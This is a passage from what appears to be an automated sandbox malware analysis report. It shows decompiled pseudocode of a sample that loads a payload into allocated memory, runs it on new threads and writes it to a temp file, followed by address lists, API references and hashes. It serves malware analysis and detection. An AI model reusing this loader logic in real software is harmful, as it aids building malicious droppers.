                                                                                                                                                                                                                                                                          															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                          															__eflags =  *_v648;
                                                                                                                                                                                                                                                                          															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                          																E04007B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                          															 *_v648 = _v632;
                                                                                                                                                                                                                                                                          															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														__eflags =  *_v648;
                                                                                                                                                                                                                                                                          														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                          															_t368 = CreateThread(0, 0, E040077B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                          															_v652 = _t368;
                                                                                                                                                                                                                                                                          															CloseHandle(_v652);
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_t550 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                          													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          														E04002510(_v636, 0x400e290);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                          											__eflags = _v620;
                                                                                                                                                                                                                                                                          											if(_v620 == 0) {
                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											E04007B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                          											_t393 = E040097A0(0x20);
                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                          											_v1224 = _t393;
                                                                                                                                                                                                                                                                          											_v624 = _v1224;
                                                                                                                                                                                                                                                                          											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                          											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                          											_v628 = CreateThread(0, 0, E04006DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                          											CloseHandle(_v628);
                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										goto L24;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                          								E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                          								E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                          								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                          								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                          								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                          								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                          								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v608 = 0;
                                                                                                                                                                                                                                                                          								_v612 = 0;
                                                                                                                                                                                                                                                                          								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                          								__eflags = _t415;
                                                                                                                                                                                                                                                                          								if(_t415 == 0) {
                                                                                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                                                                                          									__eflags = _v608;
                                                                                                                                                                                                                                                                          									if(_v608 == 0) {
                                                                                                                                                                                                                                                                          										CloseHandle(_v328);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                          								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                          								E04006C60();
                                                                                                                                                                                                                                                                          								_t421 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                          								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          								_v616 = _t421;
                                                                                                                                                                                                                                                                          								__eflags = _v616;
                                                                                                                                                                                                                                                                          								if(_v616 == 0) {
                                                                                                                                                                                                                                                                          									E04006CF0();
                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								E040074A0();
                                                                                                                                                                                                                                                                          								ExitProcess(0);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v60 =  *_v20;
                                                                                                                                                                                                                                                                          							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                          							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                          							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                          						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          							 *0x40130e4 = 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *0x40130e4 = 2;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L99;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
















































































                                                                                                                                                                                                                                                                          0x040062b9
                                                                                                                                                                                                                                                                          0x040062c4
                                                                                                                                                                                                                                                                          0x04006c4e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040062d4
                                                                                                                                                                                                                                                                          0x040062d9
                                                                                                                                                                                                                                                                          0x040062e0
                                                                                                                                                                                                                                                                          0x040062f9
                                                                                                                                                                                                                                                                          0x040062fc
                                                                                                                                                                                                                                                                          0x0400630e
                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                          0x04006343
                                                                                                                                                                                                                                                                          0x04006349
                                                                                                                                                                                                                                                                          0x04006354
                                                                                                                                                                                                                                                                          0x0400635d
                                                                                                                                                                                                                                                                          0x04006363
                                                                                                                                                                                                                                                                          0x04006429
                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                          0x0400636f
                                                                                                                                                                                                                                                                          0x04006375
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400637b
                                                                                                                                                                                                                                                                          0x04006381
                                                                                                                                                                                                                                                                          0x04006384
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006391
                                                                                                                                                                                                                                                                          0x04006393
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006399
                                                                                                                                                                                                                                                                          0x0400639f
                                                                                                                                                                                                                                                                          0x040063a2
                                                                                                                                                                                                                                                                          0x04006419
                                                                                                                                                                                                                                                                          0x0400641e
                                                                                                                                                                                                                                                                          0x04006424
                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                          0x040063ad
                                                                                                                                                                                                                                                                          0x040063c3
                                                                                                                                                                                                                                                                          0x040063c6
                                                                                                                                                                                                                                                                          0x040063ca
                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                          0x040063dc
                                                                                                                                                                                                                                                                          0x040063e1
                                                                                                                                                                                                                                                                          0x040063e4
                                                                                                                                                                                                                                                                          0x040063ef
                                                                                                                                                                                                                                                                          0x040063f4
                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                          0x04006408
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006320
                                                                                                                                                                                                                                                                          0x04006325
                                                                                                                                                                                                                                                                          0x0400632e
                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                          0x0400642e
                                                                                                                                                                                                                                                                          0x04006438
                                                                                                                                                                                                                                                                          0x0400643b
                                                                                                                                                                                                                                                                          0x0400644d
                                                                                                                                                                                                                                                                          0x04006450
                                                                                                                                                                                                                                                                          0x04006453
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006459
                                                                                                                                                                                                                                                                          0x0400645d
                                                                                                                                                                                                                                                                          0x04006482
                                                                                                                                                                                                                                                                          0x04006488
                                                                                                                                                                                                                                                                          0x04006493
                                                                                                                                                                                                                                                                          0x0400649c
                                                                                                                                                                                                                                                                          0x040064a2
                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                          0x040065f9
                                                                                                                                                                                                                                                                          0x040065fc
                                                                                                                                                                                                                                                                          0x04006609
                                                                                                                                                                                                                                                                          0x0400660f
                                                                                                                                                                                                                                                                          0x04006bdd
                                                                                                                                                                                                                                                                          0x04006be3
                                                                                                                                                                                                                                                                          0x04006be9
                                                                                                                                                                                                                                                                          0x04006c18
                                                                                                                                                                                                                                                                          0x04006c1e
                                                                                                                                                                                                                                                                          0x04006c24
                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                          0x04006c2a
                                                                                                                                                                                                                                                                          0x04006444
                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                          0x04006bf1
                                                                                                                                                                                                                                                                          0x04006bf7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006c01
                                                                                                                                                                                                                                                                          0x04006c07
                                                                                                                                                                                                                                                                          0x04006c0e
                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                          0x0400661b
                                                                                                                                                                                                                                                                          0x04006621
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006633
                                                                                                                                                                                                                                                                          0x04006638
                                                                                                                                                                                                                                                                          0x0400663e
                                                                                                                                                                                                                                                                          0x04006640
                                                                                                                                                                                                                                                                          0x04006647
                                                                                                                                                                                                                                                                          0x0400664a
                                                                                                                                                                                                                                                                          0x0400664e
                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                          0x04006758
                                                                                                                                                                                                                                                                          0x0400675b
                                                                                                                                                                                                                                                                          0x040069cb
                                                                                                                                                                                                                                                                          0x040069dc
                                                                                                                                                                                                                                                                          0x040069ed
                                                                                                                                                                                                                                                                          0x040069f2
                                                                                                                                                                                                                                                                          0x04006a1a
                                                                                                                                                                                                                                                                          0x04006a3c
                                                                                                                                                                                                                                                                          0x04006a42
                                                                                                                                                                                                                                                                          0x04006a49
                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                          0x04006a4f
                                                                                                                                                                                                                                                                          0x04006a59
                                                                                                                                                                                                                                                                          0x04006a66
                                                                                                                                                                                                                                                                          0x04006a6c
                                                                                                                                                                                                                                                                          0x04006a72
                                                                                                                                                                                                                                                                          0x04006a75
                                                                                                                                                                                                                                                                          0x04006b3c
                                                                                                                                                                                                                                                                          0x04006a7b
                                                                                                                                                                                                                                                                          0x04006a84
                                                                                                                                                                                                                                                                          0x04006aa0
                                                                                                                                                                                                                                                                          0x04006aa6
                                                                                                                                                                                                                                                                          0x04006aad
                                                                                                                                                                                                                                                                          0x04006ac5
                                                                                                                                                                                                                                                                          0x04006aca
                                                                                                                                                                                                                                                                          0x04006ad0
                                                                                                                                                                                                                                                                          0x04006af6
                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                          0x04006b1c
                                                                                                                                                                                                                                                                          0x04006b42
                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                          0x04006bc9
                                                                                                                                                                                                                                                                          0x04006bd0
                                                                                                                                                                                                                                                                          0x04006b4b
                                                                                                                                                                                                                                                                          0x04006b51
                                                                                                                                                                                                                                                                          0x04006b57
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006b60
                                                                                                                                                                                                                                                                          0x04006b6d
                                                                                                                                                                                                                                                                          0x04006b72
                                                                                                                                                                                                                                                                          0x04006b75
                                                                                                                                                                                                                                                                          0x04006b7b
                                                                                                                                                                                                                                                                          0x04006b82
                                                                                                                                                                                                                                                                          0x04006b84
                                                                                                                                                                                                                                                                          0x04006b87
                                                                                                                                                                                                                                                                          0x04006b8b
                                                                                                                                                                                                                                                                          0x04006b99
                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                          0x04006ba1
                                                                                                                                                                                                                                                                          0x04006ba7
                                                                                                                                                                                                                                                                          0x04006baa
                                                                                                                                                                                                                                                                          0x04006bb8
                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                          0x04006bc7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                          0x04006761
                                                                                                                                                                                                                                                                          0x0400676b
                                                                                                                                                                                                                                                                          0x04006775
                                                                                                                                                                                                                                                                          0x0400677f
                                                                                                                                                                                                                                                                          0x04006785
                                                                                                                                                                                                                                                                          0x04006788
                                                                                                                                                                                                                                                                          0x0400685c
                                                                                                                                                                                                                                                                          0x04006861
                                                                                                                                                                                                                                                                          0x04006864
                                                                                                                                                                                                                                                                          0x0400678e
                                                                                                                                                                                                                                                                          0x04006797
                                                                                                                                                                                                                                                                          0x040067ad
                                                                                                                                                                                                                                                                          0x040067b3
                                                                                                                                                                                                                                                                          0x040067b9
                                                                                                                                                                                                                                                                          0x040067c0
                                                                                                                                                                                                                                                                          0x040067dc
                                                                                                                                                                                                                                                                          0x040067e1
                                                                                                                                                                                                                                                                          0x040067e7
                                                                                                                                                                                                                                                                          0x040067f0
                                                                                                                                                                                                                                                                          0x040067f5
                                                                                                                                                                                                                                                                          0x040067f8
                                                                                                                                                                                                                                                                          0x040067fe
                                                                                                                                                                                                                                                                          0x04006804
                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                          0x04006819
                                                                                                                                                                                                                                                                          0x0400681f
                                                                                                                                                                                                                                                                          0x0400683a
                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                          0x04006856
                                                                                                                                                                                                                                                                          0x0400686a
                                                                                                                                                                                                                                                                          0x04006871
                                                                                                                                                                                                                                                                          0x04006877
                                                                                                                                                                                                                                                                          0x0400687a
                                                                                                                                                                                                                                                                          0x0400687e
                                                                                                                                                                                                                                                                          0x0400688c
                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                          0x04006894
                                                                                                                                                                                                                                                                          0x0400689a
                                                                                                                                                                                                                                                                          0x0400689d
                                                                                                                                                                                                                                                                          0x040068a5
                                                                                                                                                                                                                                                                          0x040068aa
                                                                                                                                                                                                                                                                          0x040068ad
                                                                                                                                                                                                                                                                          0x040068b9
                                                                                                                                                                                                                                                                          0x040068bf
                                                                                                                                                                                                                                                                          0x040068c5
                                                                                                                                                                                                                                                                          0x040068c8
                                                                                                                                                                                                                                                                          0x04006902
                                                                                                                                                                                                                                                                          0x0400690a
                                                                                                                                                                                                                                                                          0x0400690d
                                                                                                                                                                                                                                                                          0x04006920
                                                                                                                                                                                                                                                                          0x04006925
                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                          0x040068ca
                                                                                                                                                                                                                                                                          0x040068d6
                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                          0x0400693a
                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                          0x0400694b
                                                                                                                                                                                                                                                                          0x0400695a
                                                                                                                                                                                                                                                                          0x04006971
                                                                                                                                                                                                                                                                          0x04006977
                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                          0x0400698a
                                                                                                                                                                                                                                                                          0x04006990
                                                                                                                                                                                                                                                                          0x04006993
                                                                                                                                                                                                                                                                          0x040069a1
                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040069b0
                                                                                                                                                                                                                                                                          0x04006667
                                                                                                                                                                                                                                                                          0x0400666d
                                                                                                                                                                                                                                                                          0x04006674
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006689
                                                                                                                                                                                                                                                                          0x04006693
                                                                                                                                                                                                                                                                          0x04006698
                                                                                                                                                                                                                                                                          0x0400669b
                                                                                                                                                                                                                                                                          0x040066a7
                                                                                                                                                                                                                                                                          0x040066b8
                                                                                                                                                                                                                                                                          0x040066c6
                                                                                                                                                                                                                                                                          0x040066d5
                                                                                                                                                                                                                                                                          0x040066e4
                                                                                                                                                                                                                                                                          0x040066f0
                                                                                                                                                                                                                                                                          0x040066ff
                                                                                                                                                                                                                                                                          0x0400670e
                                                                                                                                                                                                                                                                          0x0400671d
                                                                                                                                                                                                                                                                          0x0400673a
                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006642
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065fe
                                                                                                                                                                                                                                                                          0x040064ae
                                                                                                                                                                                                                                                                          0x040064b4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040064cb
                                                                                                                                                                                                                                                                          0x040064dc
                                                                                                                                                                                                                                                                          0x040064ed
                                                                                                                                                                                                                                                                          0x040064f2
                                                                                                                                                                                                                                                                          0x0400651a
                                                                                                                                                                                                                                                                          0x0400653f
                                                                                                                                                                                                                                                                          0x04006545
                                                                                                                                                                                                                                                                          0x0400654c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006552
                                                                                                                                                                                                                                                                          0x0400655c
                                                                                                                                                                                                                                                                          0x0400657e
                                                                                                                                                                                                                                                                          0x04006584
                                                                                                                                                                                                                                                                          0x04006586
                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                          0x0400658e
                                                                                                                                                                                                                                                                          0x04006591
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065a0
                                                                                                                                                                                                                                                                          0x040065a6
                                                                                                                                                                                                                                                                          0x040065b2
                                                                                                                                                                                                                                                                          0x040065b7
                                                                                                                                                                                                                                                                          0x040065ba
                                                                                                                                                                                                                                                                          0x040065c0
                                                                                                                                                                                                                                                                          0x040065c7
                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                          0x040065c9
                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                          0x04006464
                                                                                                                                                                                                                                                                          0x0400646d
                                                                                                                                                                                                                                                                          0x04006476
                                                                                                                                                                                                                                                                          0x04006479
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400647b
                                                                                                                                                                                                                                                                          0x04006c33
                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                          0x04006c44
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040062e0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040063BD
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04006408
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                          • String ID: Kobucgekyxca$TEMP$TEMP
                                                                                                                                                                                                                                                                          • API String ID: 2087232378-2361037019
                                                                                                                                                                                                                                                                          • Opcode ID: 36a74629caef2e12234a485460b867fdbdc2bfda1a936d4e7568c691b9f69a1a
                                                                                                                                                                                                                                                                          • Instruction ID: 78f313c43f0008814aaec3ee7e7f4a65c37c9c75159239be5687e4ed3a221f5b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a74629caef2e12234a485460b867fdbdc2bfda1a936d4e7568c691b9f69a1a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70522BB5A042199FEB54DF94DC88FAEB7B6FB48304F148598E509BB280D775AE80CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                                                                                                          			E004015A6(struct HINSTANCE__* _a4) {
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				struct HWND__* _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				long _v68;
                                                                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                          				struct _WNDCLASSA _v120;
                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                          				void* _v140;
                                                                                                                                                                                                                                                                          				void* _v144;
                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                          				void* _v160;
                                                                                                                                                                                                                                                                          				int _v164;
                                                                                                                                                                                                                                                                          				int _v168;
                                                                                                                                                                                                                                                                          				int _v172;
                                                                                                                                                                                                                                                                          				int _v176;
                                                                                                                                                                                                                                                                          				intOrPtr _v188;
                                                                                                                                                                                                                                                                          				int _v192;
                                                                                                                                                                                                                                                                          				int _v196;
                                                                                                                                                                                                                                                                          				int _v212;
                                                                                                                                                                                                                                                                          				int _v216;
                                                                                                                                                                                                                                                                          				intOrPtr _v228;
                                                                                                                                                                                                                                                                          				int _v232;
                                                                                                                                                                                                                                                                          				intOrPtr _v236;
                                                                                                                                                                                                                                                                          				intOrPtr _v248;
                                                                                                                                                                                                                                                                          				char _v252;
                                                                                                                                                                                                                                                                          				int _v256;
                                                                                                                                                                                                                                                                          				intOrPtr _v268;
                                                                                                                                                                                                                                                                          				struct HWND__* _t107;
                                                                                                                                                                                                                                                                          				long _t128;
                                                                                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                          				void* _t181;
                                                                                                                                                                                                                                                                          				struct HWND__** _t183;
                                                                                                                                                                                                                                                                          				int* _t185;
                                                                                                                                                                                                                                                                          				intOrPtr* _t187;
                                                                                                                                                                                                                                                                          				int* _t189;
                                                                                                                                                                                                                                                                          				int* _t191;
                                                                                                                                                                                                                                                                          				intOrPtr* _t192;
                                                                                                                                                                                                                                                                          				intOrPtr* _t193;
                                                                                                                                                                                                                                                                          				int* _t194;
                                                                                                                                                                                                                                                                          				intOrPtr* _t197;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_v120.style = 0x20;
